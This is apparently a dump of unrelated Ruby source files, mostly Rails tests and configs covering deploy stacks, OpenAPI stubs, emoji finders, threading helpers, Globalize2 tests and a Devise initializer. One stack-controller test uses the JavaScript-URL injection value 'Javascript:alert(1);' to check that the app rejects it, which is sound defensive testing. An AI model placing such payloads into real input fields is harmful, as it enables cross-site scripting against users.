test "#destroy enqueues a DestroyStackJob" do
assert_enqueued_with(job: DestroyStackJob, args: [@stack]) do
delete :destroy, params: { id: @stack.to_param }
end
assert_redirected_to stacks_path
end
test "#settings is success" do
get :settings, params: { id: @stack.to_param }
assert_response :success
end
test "#statistics is success" do
get :statistics, params: { id: @stack.to_param }
assert_response :success
end
test "#statistics redirects to #show if no deploys are present" do
@stack.deploys.destroy_all
get :statistics, params: { id: @stack.to_param }
assert_redirected_to stack_path(@stack)
end
test "#update allows to lock the stack" do
refute @stack.locked?
patch :update, params: { id: @stack.to_param, stack: { lock_reason: 'Went out to eat some chips!' } }
@stack.reload
assert @stack.locked?
assert_equal shipit_users(:walrus), @stack.lock_author
end
test "#update allows to unlock the stack" do
@stack.update!(lock_reason: 'Went out to eat some chips!')
assert @stack.locked?
patch :update, params: { id: @stack.to_param, stack: { lock_reason: '' } }
@stack.reload
refute @stack.locked?
assert_instance_of AnonymousUser, @stack.lock_author
end
test "#update allows to archive the stack" do
refute @stack.archived?
refute @stack.locked?
patch :update, params: { id: @stack.to_param, stack: { archived: "true" } }
@stack.reload
assert @stack.archived?
assert @stack.locked?
assert_equal shipit_users(:walrus), @stack.lock_author
assert_equal "Archived", @stack.lock_reason
end
test "#update allows to dearchive the stack" do
@stack.archive!(shipit_users(:walrus))
assert @stack.locked?
assert @stack.archived?
patch :update, params: { id: @stack.to_param, stack: { archived: "false" } }
@stack.reload
refute @stack.archived?
refute @stack.locked?
assert_nil @stack.locked_since
assert_nil @stack.lock_reason
assert_instance_of AnonymousUser, @stack.lock_author
end
test "#refresh queues a RefreshStatusesJob and a GithubSyncJob" do
request.env['HTTP_REFERER'] = stack_settings_path(@stack)
assert_enqueued_with(job: RefreshStatusesJob, args: [stack_id: @stack.id]) do
assert_enqueued_with(job: RefreshCheckRunsJob, args: [stack_id: @stack.id]) do
assert_enqueued_with(job: GithubSyncJob, args: [stack_id: @stack.id]) do
post :refresh, params: { id: @stack.to_param }
end
end
end
assert_redirected_to stack_settings_path(@stack)
end
test "#clear_git_cache queues a ClearGitCacheJob" do
assert_enqueued_with(job: ClearGitCacheJob, args: [@stack]) do
post :clear_git_cache, params: { id: @stack.to_param }
end
assert_redirected_to stack_settings_path(@stack)
end
test "#clear_git_cache displays a flash message" do
post :clear_git_cache, params: { id: @stack.to_param }
assert_equal 'Git Cache clearing scheduled', flash[:success]
end
test "#update redirects to return_to parameter" do
patch :update, params: { id: @stack.to_param, stack: { ignore_ci: false }, return_to: stack_path(@stack) }
assert_redirected_to stack_path(@stack)
end
test "#lookup redirects to the canonical URL" do
get :lookup, params: { id: @stack.id }
assert_redirected_to stack_path(@stack)
end
test "#create does not create stack with invalid deploy_url" do
post :create, params: {
stack: {
repo_name: 'rails',
repo_owner: 'rails',
environment: 'staging',
branch: 'staging',
deploy_url: 'Javascript:alert(1);',
},
}
assert_response :success
assert_equal 'Deploy url is invalid', flash[:warning]
end
end
end
| 32.1 | 112 | 0.65135 |
79d29871da096a1600f035eace8a590134b62e90 | 1,025 | APP_ROOT = "#{File.join(File.dirname(__FILE__),"..")}/"
require 'yaml'
require 'gamebox'
require 'releasy'
Gamebox.configure do |config|
config.config_path = APP_ROOT + "config/"
config.data_path = APP_ROOT + "data/"
config.music_path = APP_ROOT + "data/music/"
config.sound_path = APP_ROOT + "data/sounds/"
config.gfx_path = APP_ROOT + "data/graphics/"
config.fonts_path = APP_ROOT + "data/fonts/"
config.gb_config_path = GAMEBOX_PATH + "config/"
config.gb_data_path = GAMEBOX_PATH + "data/"
config.gb_music_path = GAMEBOX_PATH + "data/music/"
config.gb_sound_path = GAMEBOX_PATH + "data/sounds/"
config.gb_gfx_path = GAMEBOX_PATH + "data/graphics/"
config.gb_fonts_path = GAMEBOX_PATH + "data/fonts/"
# config.stages = [:demo]
# config.game_name = "Untitled Game"
end
[GAMEBOX_PATH, APP_ROOT, File.join(APP_ROOT,'src')].each{|path| $: << path }
require "gamebox_application"
require_all Dir.glob("{src,lib}/**/*.rb").reject{ |f| f.match("src/app.rb")}
| 31.060606 | 77 | 0.677073 |
793ce008df09082027688c1c88cdf26bbf658e4b | 2,602 | =begin
#Topological Inventory Ingress API
#Topological Inventory Ingress API
OpenAPI spec version: 0.0.2
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0-SNAPSHOT
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TopologicalInventoryIngressApiClient::ServiceInstance
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'ServiceInstance' do
before do
# run before each test
@instance = TopologicalInventoryIngressApiClient::ServiceInstance.new
end
after do
# run after each test
end
describe 'test an instance of ServiceInstance' do
it 'should create an instance of ServiceInstance' do
expect(@instance).to be_instance_of(TopologicalInventoryIngressApiClient::ServiceInstance)
end
end
describe 'test attribute "source_ref"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "source_created_at"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "source_deleted_at"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "resource_timestamp"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "service_offering"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "service_parameters_set"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "source_region"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "subscription"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 28.911111 | 102 | 0.731745 |
7a75ad716d0a6af8dac396b924626b18a8536801 | 2,249 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe AwardEmojisFinder do
let_it_be(:issue_1) { create(:issue) }
let_it_be(:issue_1_thumbsup) { create(:award_emoji, name: 'thumbsup', awardable: issue_1) }
let_it_be(:issue_1_thumbsdown) { create(:award_emoji, name: 'thumbsdown', awardable: issue_1) }
# Create a matching set of emoji for a second issue.
# These should never appear in our finder results
let_it_be(:issue_2) { create(:issue) }
let_it_be(:issue_2_thumbsup) { create(:award_emoji, name: 'thumbsup', awardable: issue_2) }
let_it_be(:issue_2_thumbsdown) { create(:award_emoji, name: 'thumbsdown', awardable: issue_2) }
describe 'param validation' do
it 'raises an error if `name` is invalid' do
expect { described_class.new(issue_1, { name: 'invalid' }).execute }.to raise_error(
ArgumentError,
'Invalid name param'
)
end
it 'does not raise an error if `name` is numeric' do
subject = described_class.new(issue_1, { name: 100 })
expect { subject.execute }.not_to raise_error
end
it 'raises an error if `awarded_by` is invalid' do
expectation = [ArgumentError, 'Invalid awarded_by param']
expect { described_class.new(issue_1, { awarded_by: issue_2 }).execute }.to raise_error(*expectation)
expect { described_class.new(issue_1, { awarded_by: 'not-an-id' }).execute }.to raise_error(*expectation)
expect { described_class.new(issue_1, { awarded_by: 1.123 }).execute }.to raise_error(*expectation)
end
end
describe '#execute' do
it 'scopes to the awardable' do
expect(described_class.new(issue_1).execute).to contain_exactly(
issue_1_thumbsup, issue_1_thumbsdown
)
end
it 'filters by emoji name' do
expect(described_class.new(issue_1, { name: 'thumbsup' }).execute).to contain_exactly(issue_1_thumbsup)
expect(described_class.new(issue_1, { name: '8ball' }).execute).to be_empty
end
it 'filters by user' do
expect(described_class.new(issue_1, { awarded_by: issue_1_thumbsup.user }).execute).to contain_exactly(issue_1_thumbsup)
expect(described_class.new(issue_1, { awarded_by: issue_2_thumbsup.user }).execute).to be_empty
end
end
end
| 40.890909 | 126 | 0.70787 |
acf77d0dd5c1ec72a614808acedc9554141ea165 | 828 | module PoolArchiveTestHelper
def mock_pool_version_service!
setup do
PoolVersion.stubs(:sqs_service).returns(MockPoolSqsService.new)
PoolVersion.establish_connection(PoolVersion.database_url)
PoolVersion.connection.begin_transaction joinable: false
end
teardown do
PoolVersion.connection.rollback_transaction
end
end
class MockPoolSqsService
def send_message(msg, *options)
_, json = msg.split(/\n/)
json = JSON.parse(json)
prev = PoolVersion.where(pool_id: json["pool_id"]).order("id desc").first
if merge?(prev, json)
prev.update_columns(json)
else
PoolVersion.create!(json)
end
end
def merge?(prev, json)
prev && (prev.updater_id == json["updater_id"]) && (prev.updated_at >= 1.hour.ago)
end
end
end
| 26.709677 | 88 | 0.678744 |
1ac4af107081333894a9d4441128253fe6baefaa | 600 | class TrucksController < ApplicationController
before_action :authenticate_user, :dispatcher_or_this_truck_driver
skip_before_action :dispatcher_or_this_truck_driver, only: [:index]
def index
render json: Truck.visible_to(current_user)
end
def show
render json: Truck.find(params[:id])
end
def shift_available
render json: Truck.find(params[:id]).shift_available?(params[:date], params[:shift])
end
private
def dispatcher_or_this_truck_driver
raise 'Invalid truck id' unless current_user.truck.nil? || params[:id].to_i == current_user.truck.id
end
end
| 27.272727 | 106 | 0.755 |
1ce4c040b2416ac94c10da5f0206fe2a94d36bf5 | 564 | # == Schema Information
#
# Table name: morphology_word_verb_forms
#
# id :bigint not null, primary key
# name :string
# value :string
# created_at :datetime not null
# updated_at :datetime not null
# word_id :bigint
#
# Indexes
#
# index_morphology_word_verb_forms_on_name (name)
# index_morphology_word_verb_forms_on_word_id (word_id)
#
# Foreign Keys
#
# fk_rails_... (word_id => words.id)
#
class Morphology::WordVerbForm < ApplicationRecord
belongs_to :word, class_name: 'Morphology::Word'
end
| 23.5 | 57 | 0.675532 |
1a69a76528e6c998b3c3b4d3a94a89ad2e8e7790 | 493 | dir = Pathname(__FILE__).dirname.expand_path / 'adapters'
require dir / 'abstract_adapter'
require dir / 'in_memory_adapter'
# NOTE: this is a temporary work-around to the load error problems,
# and is better fixed in dm-core/next. The main reason the fix is
# not applied in dm-core/master is because the change is non-trivial.
%w[ data_objects sqlite3 mysql postgres ].each do |gem|
begin
require dir / "#{gem}_adapter"
rescue LoadError, Gem::Exception
# ignore it
end
end
| 29 | 69 | 0.73428 |
183ab866cdf476c3762b541a22869ee7dfee3e46 | 700 | module Cesri
class RecepcionComprobanteResponse
attr_reader :response, :state, :messages
def initialize(response)
@response = response
@state = state_value
@messages = []
load_messages
end
def success?
@state == 'RECIBIDA'
end
private
def state_value
doc.xpath('//estado').first.content if doc.xpath('//estado').first
end
def load_messages
doc.xpath('//mensajes//mensaje').each do |message|
response_message = ResponseMessage.new(message)
messages << response_message if response_message.identificador
end
end
def doc
@doc ||= Nokogiri::XML(@response.to_s)
end
end
end
| 18.918919 | 72 | 0.635714 |
b9ffb84bc8098ff820ab94f3b34cf5816a10b944 | 8,673 | #
# == Synopsis
# The Threaded module is used to perform some activity at a specified
# interval.
#
# == Details
# Sometimes it is useful for an object to have its own thread of execution
# to perform a task at a recurring interval. The Threaded module
# encapsulates this functionality so you don't have to write it yourself. It
# can be used with any object that responds to the +run+ method.
#
# The threaded object is run by calling the +start+ method. This will create
# a new thread that will invoke the +run+ method at the desired interval.
# Just before the thread is created the +before_starting+ method will be
# called (if it is defined by the threaded object). Likewise, after the
# thread is created the +after_starting+ method will be called (if it is
# defined by the threaded object).
#
# The threaded object is stopped by calling the +stop+ method. This sets an
# internal flag and then wakes up the thread. The thread gracefully exits
# after checking the flag. Like the start method, before and after methods
# are defined for stopping as well. Just before the thread is stopped the
# +before_stopping+ method will be called (if it is defined by the threaded
# object). Likewise, after the thread has died the +after_stopping+ method
# will be called (if it is defined by the threaded object).
#
# Calling the +join+ method on a threaded object will cause the calling
# thread to wait until the threaded object has stopped. An optional timeout
# parameter can be given.
#
module DirectoryWatcher::Threaded
# This method will be called by the activity thread at the desired
# interval. Implementing classes are expect to provide this
# functionality.
#
def run
raise NotImplementedError,
'The run method must be defined by the threaded object.'
end
# Start the activity thread. If already started this method will return
# without taking any action.
#
# If the including class defines a 'before_starting' method, it will be
# called before the thread is created and run. Likewise, if the
# including class defines an 'after_starting' method, it will be called
# after the thread is created.
#
def start
return self if _activity_thread.running?
before_starting if self.respond_to?(:before_starting)
@_activity_thread.start self
after_starting if self.respond_to?(:after_starting)
self
end
# Stop the activity thread. If already stopped this method will return
# without taking any action.
#
# If the including class defines a 'before_stopping' method, it will be
# called before the thread is stopped. Likewise, if the including class
# defines an 'after_stopping' method, it will be called after the thread
# has stopped.
#
def stop
return self unless _activity_thread.running?
before_stopping if self.respond_to?(:before_stopping)
@_activity_thread.stop
self
end
# Stop the activity thread from doing work. This will not stop the activity
# thread, it will just stop it from calling the 'run' method on every
# iteration. It will also not increment the number of iterations it has run.
def pause
@_activity_thread.working = false
end
# Resume the activity thread
def resume
@_activity_thread.working = true
end
# Wait on the activity thread. If the thread is already stopped, this
# method will return without taking any action. Otherwise, this method
# does not return until the activity thread has stopped, or a specific
# number of iterations has passed since this method was called.
#
def wait( limit = nil )
return self unless _activity_thread.running?
initial_iterations = @_activity_thread.iterations
loop {
break unless @_activity_thread.running?
break if limit and @_activity_thread.iterations > ( initial_iterations + limit )
Thread.pass
}
end
# If the activity thread is running, the calling thread will suspend
# execution and run the activity thread. This method does not return until
# the activity thread is stopped or until _limit_ seconds have passed.
#
# If the activity thread is not running, this method returns immediately
# with +nil+.
#
def join( limit = nil )
_activity_thread.join(limit) ? self : nil
end
# Returns +true+ if the activity thread is running. Returns +false+
# otherwise.
#
def running?
_activity_thread.running?
end
# Returns +true+ if the activity thread has finished its maximum
# number of iterations or the thread is no longer running.
# Returns +false+ otherwise.
#
def finished_iterations?
return true unless _activity_thread.running?
@_activity_thread.finished_iterations?
end
# Returns the status of threaded object.
#
# 'sleep' : sleeping or waiting on I/O
# 'run' : executing
# 'aborting' : aborting
# false : not running or terminated normally
# nil : terminated with an exception
#
# If this method returns +nil+, then calling join on the threaded object
# will cause the exception to be raised in the calling thread.
#
def status
return false if _activity_thread.thread.nil?
@_activity_thread.thread.status
end
# Sets the number of seconds to sleep between invocations of the
# threaded object's 'run' method.
#
def interval=( value )
value = Float(value)
raise ArgumentError, "Sleep interval must be >= 0" unless value >= 0
_activity_thread.interval = value
end
# Returns the number of seconds to sleep between invocations of the
# threaded object's 'run' method.
#
def interval
_activity_thread.interval
end
# Sets the maximum number of invocations of the threaded object's
# 'run' method
#
def maximum_iterations=( value )
unless value.nil?
value = Integer(value)
raise ArgumentError, "maximum iterations must be >= 1" unless value >= 1
end
_activity_thread.maximum_iterations = value
end
# Returns the maximum number of invocations of the threaded
# object's 'run' method
#
def maximum_iterations
_activity_thread.maximum_iterations
end
# Returns the number of iterations of the threaded object's 'run' method
# completed thus far.
#
def iterations
_activity_thread.iterations
end
# Set to +true+ to continue running the threaded object even if an error
# is raised by the +run+ method. The default behavior is to stop the
# activity thread when an error is raised by the run method.
#
# A SystemExit will never be caught; it will always cause the Ruby
# interpreter to exit.
#
def continue_on_error=( value )
_activity_thread.continue_on_error = (value ? true : false)
end
# Returns +true+ if the threaded object should continue running even if an
# error is raised by the run method. The default is to return +false+. The
# threaded object will stop running when an error is raised.
#
def continue_on_error?
_activity_thread.continue_on_error
end
# :stopdoc:
def _activity_thread
@_activity_thread ||= ::DirectoryWatcher::Threaded::ThreadContainer.new(60, 0, nil, false);
end # @private
# @private
ThreadContainer = Struct.new( :interval, :iterations, :maximum_iterations, :continue_on_error, :thread, :running, :working) {
def start( threaded )
self.working = true
self.running = true
self.iterations = 0
self.thread = Thread.new { run threaded }
Thread.pass
end # @private
def stop
self.running = false
thread.wakeup
end # @private
def run( threaded )
loop do
begin
break unless running?
do_work( threaded )
sleep interval if running?
rescue SystemExit; raise
rescue Exception => err
if continue_on_error
$stderr.puts err
else
$stderr.puts err
raise err
end
end
end
ensure
if threaded.respond_to?(:after_stopping) and !self.running
threaded.after_stopping
end
self.running = false
end # @private
def join( limit = nil )
return if thread.nil?
limit ? thread.join(limit) : thread.join
end # @private
def do_work( threaded )
if working then
threaded.run
if maximum_iterations
self.iterations += 1
if finished_iterations?
self.running = false
end
end
end
end # @private
def finished_iterations?
return true if maximum_iterations and (iterations >= maximum_iterations)
return false
end # @private
alias :running? :running
}
# :startdoc:
end
| 31.197842 | 127 | 0.70068 |
613f518077d071c2452522384fd8340ee1ba801d | 363 | require "bundler/setup"
require "testqit"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 24.2 | 66 | 0.752066 |
e892156a4d1619d8845d786c23bfc6638bf0faa2 | 6,492 | require File.join( File.dirname(__FILE__), '..', 'test_helper' )
require 'active_record'
begin
require 'globalize/model/active_record'
rescue MissingSourceFile
puts "This plugin requires the Globalize2 plugin: http://github.com/joshmh/globalize2/tree/master"
puts
raise
end
require 'globalize2_versioning'
# Hook up model translation
ActiveRecord::Base.send :include, Globalize::Model::ActiveRecord::Translated
ActiveRecord::Base.send :include, Globalize::Model::ActiveRecord::Versioned
# Load Section model
require File.join( File.dirname(__FILE__), '..', 'data', 'post' )
class VersionedTest < ActiveSupport::TestCase
def setup
I18n.locale = :'en-US'
I18n.fallbacks.clear
reset_db! File.expand_path(File.join(File.dirname(__FILE__), '..', 'data', 'schema.rb'))
end
########################################
# Test translated field only for Section
########################################
test "modifiying translated fields" do
section = Section.create :title => 'foo'
assert_equal 'foo', section.title
section.title = 'bar'
assert_equal 'bar', section.title
end
test "modifiying translated fields while switching locales" do
section = Section.create :title => 'foo'
assert_equal 'foo', section.title
I18n.locale = :'de-DE'
section.title = 'bar'
assert_equal 'bar', section.title
I18n.locale = :'en-US'
assert_equal 'foo', section.title
I18n.locale = :'de-DE'
section.title = 'bar'
end
test "has section_translations" do
section = Section.create
assert_nothing_raised { section.globalize_translations }
end
test "returns the value passed to :title" do
section = Section.new
assert_equal 'foo', (section.title = 'foo')
end
test "translates subject and content into en-US" do
section = Section.create :title => 'foo', :content => 'bar'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
assert section.save
section.reload
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "finds a German section" do
I18n.fallbacks.map 'de-DE' => [ 'en-US' ]
section = Section.create :title => 'foo (en)', :content => 'bar'
I18n.locale = 'de-DE'
section = Section.first
section.title = 'baz (de)'
assert section.save
assert_equal 'baz (de)', Section.first.title
I18n.locale = :'en-US'
assert_equal 'foo (en)', Section.first.title
end
test "saves an English section and loads test correctly" do
assert_nil Section.first
section = Section.create :title => 'foo', :content => 'bar'
assert section.save
section = Section.first
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "updates an attribute" do
section = Section.create :title => 'foo', :content => 'bar'
section.update_attribute :title, 'baz'
section = Section.first
assert_equal 'baz', Section.first.title
end
test "updates an attribute with fallback" do
I18n.fallbacks.map :de => [ :'en-US' ]
section = Section.create :title => 'foo', :content => 'bar'
section.update_attribute :title, 'baz'
assert_equal 'baz', section.title
I18n.locale = :de
assert_equal 'baz', section.title
I18n.locale = :'en-US'
section = Section.first
assert_equal 'baz', section.title
I18n.locale = :de
assert_equal 'baz', section.title
assert_equal 'baz', Section.first.title
end
test "validates presence of :content" do
section = Section.new
assert !section.save
section = Section.new :content => 'foo'
assert section.save
end
test "returns the value for the correct locale, after locale switching" do
section = Section.create :title => 'foo', :content => 'bar'
I18n.locale = 'de-DE'
section.title = 'bar'
section.save
I18n.locale = 'en-US'
section = Section.first
assert_equal 'foo', section.title
I18n.locale = 'de-DE'
assert_equal 'bar', section.title
end
test "returns the value for the correct locale, after locale switching, without saving" do
section = Section.create :title => 'foo'
I18n.locale = 'de-DE'
section.title = 'bar'
I18n.locale = 'en-US'
assert_equal 'foo', section.title
I18n.locale = 'de-DE'
assert_equal 'bar', section.title
end
test "saves all locales, even after locale switching" do
section = Section.new :content => 'foo'
I18n.locale = 'de-DE'
section.content = 'bar'
I18n.locale = 'he-IL'
section.content = 'baz'
assert section.save
I18n.locale = 'en-US'
section = Section.first
assert_equal 'foo', section.content
I18n.locale = 'de-DE'
assert_equal 'bar', section.content
I18n.locale = 'he-IL'
assert_equal 'baz', section.content
end
test "resolves a simple fallback" do
I18n.locale = 'de-DE'
section = Section.create :title => 'foo', :content => 'bar'
I18n.locale = 'de'
section.title = 'baz'
section.content = 'bar'
section.save
I18n.locale = 'de-DE'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "resolves a simple fallback without reloading" do
I18n.locale = 'de-DE'
section = Section.new :title => 'foo'
I18n.locale = 'de'
section.title = 'baz'
section.content = 'bar'
I18n.locale = 'de-DE'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "resolves a complex fallback without reloading" do
I18n.fallbacks.map 'de' => %w(en he)
I18n.locale = 'de'
section = Section.new
I18n.locale = 'en'
section.title = 'foo'
I18n.locale = 'he'
section.title = 'baz'
section.content = 'bar'
I18n.locale = 'de'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "returns nil if no translations are found" do
section = Section.new :title => 'foo'
assert_equal 'foo', section.title
assert_nil section.content
end
test "returns nil if no translations are found; reloaded" do
section = Section.create :content => 'foo'
section = Section.first
assert_equal 'foo', section.content
assert_nil section.title
end
test "works with simple dynamic finders" do
foo = Section.create :title => 'foo', :content => 'bar'
Section.create :title => 'bar'
section = Section.find_by_title('foo')
assert_equal foo, section
end
end
| 29.375566 | 100 | 0.657116 |
d5741fd4dc358b5ca3a9d2edb96a9992cc1d8c16 | 1,432 | require "pact_broker/pacticipants/generate_display_name"
module PactBroker
module Pacticipants
describe GenerateDisplayName do
describe ".call" do
TEST_CASES = {
"foo" => "Foo",
"MyService" => "My Service",
"my-service" => "My Service",
"my_service" => "My Service",
"my service" => "My Service",
"ABCService" => "ABC Service",
"A4Service" => "A4 Service",
"SNSPactEventConsumer" => "SNS Pact Event Consumer",
"AWSSummiteerWeb" => "AWS Summiteer Web",
"Beer-Consumer" => "Beer Consumer",
"foo.pretend-consumer" => "Foo Pretend Consumer",
"Client-XX" => "Client XX",
"providerJSWorkshop" => "Provider JS Workshop",
"e2e Provider Example" => "E2e Provider Example",
"MP - Our Provider" => "MP - Our Provider",
"PoC - Pact-broker-consumer" => "PoC - Pact Broker Consumer",
"QB-DATABASE Service" => "QB DATABASE Service",
"Support Species App (Provider)" => "Support Species App (Provider)",
9 => "9",
"" => "",
nil => nil
}
TEST_CASES.each do | name, expected_display_name |
it "converts #{name.inspect} to #{expected_display_name.inspect}" do
expect(GenerateDisplayName.call(name)).to eq expected_display_name
end
end
end
end
end
end
| 35.8 | 79 | 0.560754 |
4a87f08453b5b20076944bcd463c3895bece3402 | 13,642 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = 'bc55e299b21a6c3723551729d0d8b6e079f271e4c5743b38233338a8898598c88e9e93dfee36c32e73988bd02631621d49cb7e1fb649fa6a70d9c5267c68c6bb'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '49f463ec3f9d77e9ad1379ccd8e0d88dbbe16fb1e336b3e1f1cc29053b6d09f37d1ec4222329d6d5d3c710929f87ac996b751e53e181856dc9a9117d2ea5d7e3'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
